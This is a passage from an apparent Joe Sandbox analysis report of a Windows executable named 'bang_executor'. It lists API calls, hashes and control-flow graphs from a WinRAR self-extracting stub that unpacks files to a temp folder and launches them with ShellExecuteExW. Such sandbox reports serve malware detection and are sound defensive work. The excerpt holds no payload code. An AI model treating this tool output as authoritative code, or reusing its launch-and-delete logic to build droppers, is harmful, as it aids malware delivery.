                                        • Opcode Fuzzy Hash: 56be42ef1b0f47f2eacc54312db6d79cb66e4c63dda135be7d9620c19e95fdf8
                                        • Instruction Fuzzy Hash: 62D180B1048388ABE730DF55D948BDFBFF8BB89308F10491DF69996250C7B48589CB66
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FDAE0 Relevance: 97.0, APIs: 48, Strings: 7, Instructions: 750windowfilesleepCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004E1366: GetDlgItem.USER32(00000000,00003021), ref: 004E13AA
                                          • Part of subcall function 004E1366: SetWindowTextW.USER32(00000000,005165F4), ref: 004E13C0
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 004FDC06
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004FDC24
                                        • IsDialogMessageW.USER32(?,?), ref: 004FDC37
                                        • TranslateMessage.USER32(?), ref: 004FDC45
                                        • DispatchMessageW.USER32(?), ref: 004FDC4F
                                        • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 004FDC72
                                        • EndDialog.USER32(?,00000001), ref: 004FDC95
                                        • GetDlgItem.USER32(?,00000068), ref: 004FDCB8
                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 004FDCD3
                                        • SendMessageW.USER32(00000000,000000C2,00000000,005165F4), ref: 004FDCE6
                                          • Part of subcall function 004FF77B: _wcslen.LIBCMT ref: 004FF7A5
                                        • SetFocus.USER32(00000000), ref: 004FDCED
                                        • _swprintf.LIBCMT ref: 004FDD4C
                                          • Part of subcall function 004E4C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004E4C13
                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 004FDDAF
                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 004FDDD7
                                        • GetTickCount.KERNEL32 ref: 004FDDF5
                                        • _swprintf.LIBCMT ref: 004FDE0D
                                        • GetLastError.KERNEL32(?,00000011), ref: 004FDE3F
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,00000000,00000000,00000000,?,00000800), ref: 004FDE92
                                        • _swprintf.LIBCMT ref: 004FDEC9
                                        • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp,?,?,?,?,00533482,00000200), ref: 004FDF1D
                                        • GetCommandLineW.KERNEL32(?,?,?,?,00533482,00000200), ref: 004FDF33
                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00533482,00000400,00000001,00000001,?,?,?,?,00533482,00000200), ref: 004FDF8A
                                        • ShellExecuteExW.SHELL32(?), ref: 004FDFB2
                                        • WaitForInputIdle.USER32(?,00002710), ref: 004FDFE6
                                        • Sleep.KERNEL32(00000064,?,?,?,?,00533482,00000200), ref: 004FDFFA
                                        • UnmapViewOfFile.KERNEL32(?,?,0000421C,00533482,00000400,?,?,?,?,00533482,00000200), ref: 004FE023
                                        • CloseHandle.KERNEL32(?,?,?,?,?,00533482,00000200), ref: 004FE02C
                                        • _swprintf.LIBCMT ref: 004FE05F
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 004FE0BE
                                        • SetDlgItemTextW.USER32(?,00000065,005165F4), ref: 004FE0D5
                                        • GetDlgItem.USER32(?,00000065), ref: 004FE0DE
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 004FE0ED
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004FE0FC
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 004FE1A9
                                        • _wcslen.LIBCMT ref: 004FE1FF
                                        • _swprintf.LIBCMT ref: 004FE229
                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 004FE273
                                        • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 004FE28D
                                        • GetDlgItem.USER32(?,00000068), ref: 004FE296
                                        • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 004FE2AC
                                        • GetDlgItem.USER32(?,00000066), ref: 004FE2C6
                                        • SetWindowTextW.USER32(00000000,0053589A), ref: 004FE2E8
                                        • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 004FE348
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 004FE35B
                                        • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001D8C0,00000000,?), ref: 004FE3FE
                                        • EnableWindow.USER32(00000000,00000000), ref: 004FE4CC
                                        • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 004FE50E
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 004FE532
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Item$MessageText$Send$Window_swprintf$File$DialogErrorLast$LongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamShellSleepTickTranslateUnmapWait__vswprintf_c_l
                                        • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                        • API String ID: 2963869496-1712381250
                                        • Opcode ID: bab61a46e60fd441460b6a44655ce764ddc0335e8b7a353cf6c975c4f4768955
                                        • Instruction ID: 6ffc3fc1a893c3741bbfcf14e67a070838e4aa4e321da23f248c94f2b294f657
                                        • Opcode Fuzzy Hash: bab61a46e60fd441460b6a44655ce764ddc0335e8b7a353cf6c975c4f4768955
                                        • Instruction Fuzzy Hash: D0420B7094034CBAEB31AB61DC49FFF7B68AB16709F10401BF704A61E2D7784A49DB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FF7FC Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 103windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004FD864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004FD875
                                          • Part of subcall function 004FD864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004FD886
                                          • Part of subcall function 004FD864: IsDialogMessageW.USER32(0001045C,?), ref: 004FD89A
                                          • Part of subcall function 004FD864: TranslateMessage.USER32(?), ref: 004FD8A8
                                          • Part of subcall function 004FD864: DispatchMessageW.USER32(?), ref: 004FD8B2
                                        • GetDlgItem.USER32(00000068,00543CF0), ref: 004FF81F
                                        • ShowWindow.USER32(00000000,00000005,?,?,004FD099,00000001,?,?,004FDAB9,005182F0,00543CF0,00543CF0,00001000,005250C4,00000000,?), ref: 004FF844
                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 004FF853
                                        • SendMessageW.USER32(00000000,000000C2,00000000,005165F4), ref: 004FF861
                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 004FF87B
                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 004FF895
                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 004FF8D9
                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 004FF8E4
                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 004FF8F7
                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 004FF91E
                                        • SendMessageW.USER32(00000000,000000C2,00000000,0051769C), ref: 004FF92D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                        • String ID: \
                                        • API String ID: 3569833718-2967466578
                                        • Opcode ID: e9a9f44445ab6316644779f57a90569146293093ac53dbfde64edc90623e2900
                                        • Instruction ID: 272cf67dd3562f2e462dfb2602da148fec8877411f1f6078e5eb73bb5289f240
                                        • Opcode Fuzzy Hash: e9a9f44445ab6316644779f57a90569146293093ac53dbfde64edc90623e2900
                                        • Instruction Fuzzy Hash: 0A31D2712497186FE310EF24DC4AFAB7FA8EF6A708F000D19F6A19A191D764590CC7A6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FFAFC Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 198windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 708 4ffafc-4ffb2e call 501590 711 4ffd7e-4ffd95 call 5010f9 708->711 712 4ffb34-4ffb40 call 506433 708->712 712->711 717 4ffb46-4ffb6e call 502640 712->717 720 4ffb78-4ffb89 717->720 721 4ffb70 717->721 722 4ffb8b-4ffb92 720->722 723 4ffb94-4ffb9d 720->723 721->720 724 4ffb9f-4ffba3 722->724 723->724 725 4ffbfa 723->725 726 4ffba6-4ffbac 724->726 727 4ffbfe-4ffc00 725->727 730 4ffbae 726->730 731 4ffbcd-4ffbda 726->731 728 4ffc07-4ffc09 727->728 729 4ffc02-4ffc05 727->729 732 4ffc1c-4ffc32 call 4ed848 728->732 733 4ffc0b-4ffc12 728->733 729->728 729->732 734 4ffbb8-4ffbc2 730->734 735 4ffd53-4ffd55 731->735 736 4ffbe0-4ffbe4 731->736 746 4ffc4b-4ffc56 call 4ebccb 732->746 747 4ffc34-4ffc41 call 4f4168 732->747 733->732 737 4ffc14 733->737 739 4ffbc4 734->739 740 4ffbb0-4ffbb6 734->740 741 4ffd59-4ffd61 735->741 736->741 742 4ffbea-4ffbf4 736->742 737->732 739->731 740->734 744 4ffbc6-4ffbc9 740->744 741->727 742->726 745 4ffbf6 742->745 744->731 745->725 753 4ffc58-4ffc6f call 4ed563 746->753 754 4ffc73-4ffc80 ShellExecuteExW 746->754 747->746 752 4ffc43 747->752 752->746 753->754 754->711 755 4ffc86-4ffc8c 754->755 758 4ffc9f-4ffca1 755->758 759 4ffc8e-4ffc95 755->759 761 4ffcb8-4ffccb WaitForInputIdle call 50004d 758->761 762 4ffca3-4ffcac IsWindowVisible 758->762 759->758 760 4ffc97-4ffc9d 759->760 760->758 763 4ffd0e-4ffd1a CloseHandle 760->763 768 4ffcd0-4ffcd7 761->768 762->761 764 4ffcae-4ffcb6 ShowWindow 762->764 766 4ffd1c-4ffd29 call 4f4168 763->766 767 4ffd2b-4ffd39 763->767 764->761 766->767 777 4ffd66 766->777 770 4ffd6d-4ffd6f 767->770 771 4ffd3b-4ffd3d 767->771 768->763 772 4ffcd9-4ffce1 768->772 770->711 775 4ffd71-4ffd73 770->775 771->770 774 4ffd3f-4ffd45 771->774 772->763 776 4ffce3-4ffcf4 GetExitCodeProcess 772->776 774->770 778 4ffd47-4ffd51 774->778 775->711 779 4ffd75-4ffd78 ShowWindow 775->779 776->763 780 4ffcf6-4ffd00 776->780 777->770 778->770 779->711 781 4ffd07 780->781 782 4ffd02 780->782 781->763 782->781
                                        APIs
                                        • _wcslen.LIBCMT ref: 004FFB35
                                        • ShellExecuteExW.SHELL32(?), ref: 004FFC78
                                        • IsWindowVisible.USER32(?), ref: 004FFCA4
                                        • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 004FFCB0
                                        • WaitForInputIdle.USER32(?,000007D0), ref: 004FFCC1
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 004FFCEC
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 004FFD12
                                        • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 004FFD78
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_wcslen
                                        • String ID: .exe$.inf
                                        • API String ID: 3646668279-3750412487
                                        • Opcode ID: 199b8e391a0766b91dacbdd375541cb0598060356c23f00ac131f76c8a24dbf9
                                        • Instruction ID: efc92b9f156974fff9eaa5183e962ef6ecd6b9ab2494a0b02c1d211227f2fe43
                                        • Opcode Fuzzy Hash: 199b8e391a0766b91dacbdd375541cb0598060356c23f00ac131f76c8a24dbf9
                                        • Instruction Fuzzy Hash: F161B0351083889BD7309F20D8446BBBBE4AF95704F04482FFAC5973A0E778998D9B5A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050CFAB Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 783 50cfab-50cfc4 784 50cfc6-50cfd6 call 51159c 783->784 785 50cfda-50cfdf 783->785 784->785 792 50cfd8 784->792 786 50cfe1-50cfe9 785->786 787 50cfec-50d010 MultiByteToWideChar 785->787 786->787 790 50d1a3-50d1b6 call 5010f9 787->790 791 50d016-50d022 787->791 793 50d024-50d035 791->793 794 50d076 791->794 792->785 797 50d054-50d065 call 50bc8e 793->797 798 50d037-50d046 call 514660 793->798 796 50d078-50d07a 794->796 800 50d080-50d093 MultiByteToWideChar 796->800 801 50d198 796->801 797->801 811 50d06b 797->811 798->801 810 50d04c-50d052 798->810 800->801 804 50d099-50d0ab call 50d5bc 800->804 805 50d19a-50d1a1 call 50d213 801->805 812 50d0b0-50d0b4 804->812 805->790 814 50d071-50d074 810->814 811->814 812->801 815 50d0ba-50d0c1 812->815 814->796 816 50d0c3-50d0c8 815->816 817 50d0fb-50d107 815->817 816->805 818 50d0ce-50d0d0 816->818 819 50d153 817->819 820 50d109-50d11a 817->820 818->801 821 50d0d6-50d0f0 call 50d5bc 818->821 822 50d155-50d157 819->822 823 50d135-50d146 call 50bc8e 820->823 824 50d11c-50d12b call 514660 820->824 821->805 838 50d0f6 821->838 828 50d191-50d197 call 50d213 822->828 829 50d159-50d172 call 50d5bc 822->829 823->828 837 50d148 823->837 824->828 835 50d12d-50d133 824->835 828->801 829->828 841 50d174-50d17b 829->841 840 50d14e-50d151 835->840 837->840 838->801 840->822 842 50d1b7-50d1bd 841->842 843 50d17d-50d17e 841->843 844 50d17f-50d18f WideCharToMultiByte 842->844 843->844 844->828 845 50d1bf-50d1c6 call 50d213 844->845 845->805
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00507F99,00507F99,?,?,?,0050D1FC,00000001,00000001,62E85006), ref: 0050D005
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0050D1FC,00000001,00000001,62E85006,?,?,?), ref: 0050D08B
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0050D185
                                        • __freea.LIBCMT ref: 0050D192
                                          • Part of subcall function 0050BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00506A24,?,0000015D,?,?,?,?,00507F00,000000FF,00000000,?,?), ref: 0050BCC0
                                        • __freea.LIBCMT ref: 0050D19B
                                        • __freea.LIBCMT ref: 0050D1C0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        • Opcode ID: 026901ac83183ebeec612cce807d5b1b2d7c6273c1f3c0995649adfcefcf3944
                                        • Instruction ID: 9f5a8a2b1e4df55d0ced540992b329e4cdfd43c377c152f4fe0047d08d138cf0
                                        • Opcode Fuzzy Hash: 026901ac83183ebeec612cce807d5b1b2d7c6273c1f3c0995649adfcefcf3944
                                        • Instruction Fuzzy Hash: 6D519072600217AAEB258FA4CC45EBF7FBAFB85750F154629FD05D6180EB34DC84D6A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FD392 Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 848 4fd392-4fd3b0 GetCurrentProcess OpenProcessToken 849 4fd415 848->849 850 4fd3b2-4fd3ca GetTokenInformation 848->850 853 4fd417-4fd419 849->853 851 4fd3cc-4fd3d5 GetLastError 850->851 852 4fd3d7-4fd3f8 call 5089f6 GetTokenInformation 850->852 851->849 851->852 856 4fd3fa-4fd407 CopySid 852->856 857 4fd409-4fd413 call 5066a9 852->857 856->857 857->853
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00020008,?), ref: 004FD3A1
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004FD3A8
                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 004FD3C2
                                        • GetLastError.KERNEL32 ref: 004FD3CC
                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 004FD3F0
                                        • CopySid.ADVAPI32(00000044,?,00000000), ref: 004FD401
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Token$InformationProcess$CopyCurrentErrorLastOpen
                                        • String ID:
                                        • API String ID: 3984476752-0
                                        • Opcode ID: 723f62dd5577d5f954407f91ccedee32ab509cec10d93a42b22dc98a88af932b
                                        • Instruction ID: 135f76f60b847a4e11b8ff7e0bab85450b713465cb3719df922f2f534cacd81e
                                        • Opcode Fuzzy Hash: 723f62dd5577d5f954407f91ccedee32ab509cec10d93a42b22dc98a88af932b
                                        • Instruction Fuzzy Hash: 8E015B7590121CBFDB125BA0AC89EEF7B7DEB19354F100026F605A1190E7759A48AA24
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050004D Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 860 50004d-500066 WaitForSingleObject 861 500068-500069 860->861 862 5000ae-5000b0 860->862 863 50006b-50007b PeekMessageW 861->863 864 50007d-500098 GetMessageW TranslateMessage DispatchMessageW 863->864 865 50009e-5000ab WaitForSingleObject 863->865 864->865 865->863 866 5000ad 865->866 866->862
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00500059
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00500073
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00500084
                                        • TranslateMessage.USER32(?), ref: 0050008E
                                        • DispatchMessageW.USER32(?), ref: 00500098
                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 005000A3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 2148572870-0
                                        • Opcode ID: f7a937ebc6c93880e228bed6072225e56dc869fca7041d96f7b15b5dbfbd51f4
                                        • Instruction ID: 0a5c47d9acb7b6422f7277ec4f28368209aa6eab93ff073ca2fa809ded021319
                                        • Opcode Fuzzy Hash: f7a937ebc6c93880e228bed6072225e56dc869fca7041d96f7b15b5dbfbd51f4
                                        • Instruction Fuzzy Hash: E2F03C72A0222DABCB205BA1DC4CECF7E6DEF56755F008011B50AD2090D774C589DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FF191 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 867 4ff191-4ff194 868 4ff31a-4ff31d 867->868 869 4ff19a-4ff1c4 GetTempPathW call 4ed52f 867->869 871 4ff6ea-4ff712 call 4fd5dd 868->871 872 4ff323-4ff329 868->872 877 4ff1c8-4ff1ec call 4e4c00 call 4ebccb 869->877 882 4fea89-4fea9d 871->882 883 4ff717-4ff739 call 5010f9 871->883 874 4ff32b 872->874 875 4ff335-4ff33c 872->875 874->875 875->871 892 4ff1ee-4ff203 SetDlgItemTextW 877->892 893 4ff1c6-4ff1c7 877->893 884 4fea9e-4feab3 call 4fd148 882->884 891 4ff73c-4ff741 call 5013f9 883->891 894 4feab5 884->894 892->871 896 4ff209-4ff210 892->896 893->877 897 4feab7-4feacc call 4f4168 894->897 896->871 899 4ff216-4ff231 call 50483c 896->899 906 4feace-4fead2 897->906 907 4fead9-4feadc 897->907 904 4ff28f-4ff297 899->904 905 4ff233-4ff23f 899->905 911 4ff2c9-4ff2f7 call 4fce62 call 4fc774 904->911 912 4ff299-4ff2c4 call 4f268b * 2 904->912 905->904 909 4ff241 905->909 906->897 910 4fead4 906->910 907->871 908 4feae2 907->908 913 4fed4f-4fed51 908->913 914 4fecae-4fecb0 908->914 915 4fed6d-4fed6f 908->915 916 4feae9-4feaec 908->916 917 4ff244-4ff248 909->917 910->871 911->871 946 4ff2fd-4ff315 EndDialog 911->946 912->911 913->871 925 4fed57-4fed68 SetWindowTextW 913->925 914->871 920 4fecb6-4fecc2 914->920 915->871 927 4fed75-4fed7c 915->927 916->871 922 4feaf2-4feb46 call 4fc5dd call 4edd18 call 4ec351 call 4ec48b call 4e7eed 916->922 923 4ff25c-4ff27f call 4f268b 917->923 924 4ff24a-4ff258 917->924 928 4fecd6-4fecdb 920->928 929 4fecc4-4fecd5 call 509f09 920->929 993 4fec85-4fec97 call 4ec3de 922->993 923->891 950 4ff285-4ff287 923->950 924->917 932 4ff25a 924->932 925->871 927->871 935 4fed82-4fed9b 927->935 941 4fecdd-4fece3 928->941 942 4fece5-4fecf0 call 4fd76e 928->942 929->928 932->904 936 4fed9d 935->936 937 4feda3-4fedb1 call 506433 935->937 936->937 937->871 956 4fedb7-4fedc0 937->956 948 4fecf5-4fecf7 941->948 942->948 946->871 954 4fecf9-4fed00 call 506433 948->954 955 4fed02-4fed22 call 506433 call 5066ae 948->955 950->904 954->955 976 4fed3b-4fed3d 955->976 977 4fed24-4fed2b 955->977 960 4fede9-4fedec 956->960 961 4fedc2-4fedc6 956->961 967 4fedf2-4fedf5 960->967 969 4feee4-4feef2 call 4f268b 960->969 966 4fedc8-4fedd0 961->966 961->967 966->871 971 4fedd6-4fede4 call 4f268b 966->971 974 4fedf7-4fedfc 967->974 975 4fee02-4fee1d 967->975 985 4feef4-4fef08 call 504b4e 969->985 971->985 974->969 974->975 988 4fee1f-4fee5a 975->988 989 4fee7a-4fee81 975->989 976->871 983 4fed43-4fed4a call 5066a9 976->983 981 4fed2d-4fed2f 977->981 982 4fed32-4fed3a call 509f09 977->982 981->982 982->976 983->871 1004 4fef0a-4fef0e 985->1004 1005 4fef15-4fef6f call 4f268b call 4fd41c GetDlgItem SetWindowTextW SendMessageW call 508796 985->1005 1022 4fee5c-4fee63 988->1022 1023 4fee6b 988->1023 995 4feeaf-4feed2 call 506433 * 2 989->995 996 4fee83-4fee9b call 506433 989->996 1009 4fec9d-4feca9 call 4ec367 993->1009 1010 4feb4b-4feb5f SetFileAttributesW 993->1010 995->985 1030 4feed4-4feee2 call 4f2663 995->1030 996->995 1015 4fee9d-4feeaa call 4f2663 996->1015 1004->1005 1011 4fef10-4fef12 1004->1011 1005->871 1043 4fef75-4fef89 SendMessageW 1005->1043 1009->871 1017 4fec05-4fec15 GetFileAttributesW 1010->1017 1018 4feb65-4feb98 call 4ed8ac call 4ed52f call 506433 1010->1018 1011->1005 1015->995 1017->993 1019 4fec17-4fec26 DeleteFileW 1017->1019 1047 4febab-4febb9 call 4edcd9 1018->1047 1048 4feb9a-4feba9 call 506433 1018->1048 1019->993 1028 